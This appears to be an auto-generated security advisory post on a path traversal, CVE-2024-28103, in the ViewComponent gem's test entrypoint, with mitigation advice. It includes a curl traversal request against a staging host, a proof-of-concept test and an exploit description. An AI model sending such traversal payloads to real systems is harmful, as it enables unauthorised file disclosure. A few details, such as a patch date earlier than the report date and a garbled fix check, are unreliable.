Listen to this Post
How CVE-2024-28103 works:
The system test entrypoint in `ViewComponentsSystemTestController` resolves a user-controlled file path using File.realpath. It then checks if the resolved path starts with the temporary directory’s realpath as a string prefix. This check is unsafe because sibling directories sharing the same prefix pass the test. For example, base path `/app/tmp/view_components` and attacker path `/app/tmp/view_components_evil/secret.html.erb` – the latter is outside the intended directory but `start_with?` returns true. The controller then renders the sibling file via Rails. The route is mounted only in Rails.env.test?, but exposure in CI, staging, review apps, or misconfigured production test routes makes this a medium-severity issue. Attackers can traverse to sibling directories like `../view_components2/poc.html` or ../view_components.bak/poc.html. A fuzzing harness confirmed multiple bypasses. The provided PoC creates a sibling directory, writes a test file, sends a GET request with file=../view_components_evil/secret.html.erb, and verifies the response body contains the injected content. The vulnerability exists because `start_with?` does not enforce path boundaries – a trailing separator (/) is missing in the check. The impacted code appears in app/controllers/view_components_system_test_controller.rb. An attacker can read or render arbitrary files from sibling directories adjacent to the temp folder, potentially leaking secrets or HTML templates. The fix requires path-aware containment using `Pathname` or a separator-suffixed prefix.
dailycve form:
Platform: ViewComponent gem
Version: 2.83.0 to 3.8.0
Vulnerability: Path Traversal
Severity: Medium
Date: 2024-03-05
Prediction: 2024-03-04 patch release
What Undercode Say:
Analytics – Bash & code to detect/verify:
Check vulnerable version in Gemfile.lock
grep -A 1 "view_component" Gemfile.lock | grep " version:" | awk '{print $2}'
Simulate the traversal with curl (assuming test route exposed)
curl -k "https://staging-app.com/_system_test_entrypoint?file=../view_components_evil/secret.html.erb"
Run the official PoC test
cat > test/sandbox/poc_test.rb << 'EOF'
require "test_helper"
class PathTraversalPocTest < ActionDispatch::IntegrationTest
def test_traversal
get "/_system_test_entrypoint", params: {file: "../view_components_evil/poc"}
assert_response :success
end
end
EOF
bundle exec ruby -Itest test/sandbox/poc_test.rb
How Exploit:
Attacker sends HTTP GET to `/_system_test_entrypoint?file=../[bash]_evil/sensitive.html.erb` where `[bash]` matches the temp dir basename. The request bypasses the prefix check, and Rails renders the external file. No authentication required if route reachable.
Protection from this CVE:
Upgrade view_component to `>= 3.9.0` or apply the fix: replace `start_with?` with `Pathname.relative_path_from` and reject paths containing .., or check "{base_path}{File::SEPARATOR}".start_with?. Disable test routes in production by ensuring `Rails.env.test?` is never true outside test environments. Add regression tests for sibling, symlink, and parent traversal.
Impact:
Information disclosure (reading arbitrary sibling files) on environments where the test route is accidentally exposed. This includes CI pipelines, review apps, staging servers with test mode enabled, or production with misconfigured RAILS_ENV. Attackers can retrieve ERB templates, configuration files, or source code from sibling directories adjacent to the temporary view components folder.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
